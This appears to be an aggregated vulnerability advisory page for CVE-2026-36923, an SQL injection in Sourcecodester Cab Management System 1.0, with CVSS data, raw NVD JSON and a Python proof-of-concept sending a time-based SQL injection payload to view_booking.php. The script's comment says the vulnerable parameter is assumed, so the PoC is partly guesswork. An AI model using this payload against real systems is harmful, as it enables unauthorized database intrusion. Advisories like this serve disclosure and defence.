Security Vulnerability Report
中文
CVE-2026-36923 CVSS 2.7 LOW

CVE-2026-36923

Published: 2026-04-13 13:16:42
Last Modified: 2026-04-14 17:43:24

Description

Sourcecodester Cab Management System 1.0 is vulnerable to SQL Injection in the file /cms/admin/bookings/view_booking.php.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oretnom23:cab_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Cab Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target_host/cms/admin/bookings/view_booking.php" # Payload to test SQL injection (e.g., time-based) # Assuming a parameter like 'id' is vulnerable based on common patterns payload = { "id": "1' AND SLEEP(5)-- -" } # High privilege cookies are required (PR:H) cookies = { "PHPSESSID": "authenticated_admin_session_id_here" } try: response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) # Check if the response time indicates successful execution of the sleep command if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability detected: SQL Injection successful (Time-based).") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36923", "sourceIdentifier": "[email protected]", "published": "2026-04-13T13:16:42.107", "lastModified": "2026-04-14T17:43:23.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Cab Management System 1.0 is vulnerable to SQL Injection in the file /cms/admin/bookings/view_booking.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:cab_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "62692EFD-FCF7-4257-9FDD-81F20FAF20E7"}]}]}], "references": [{"url": "https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-2.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}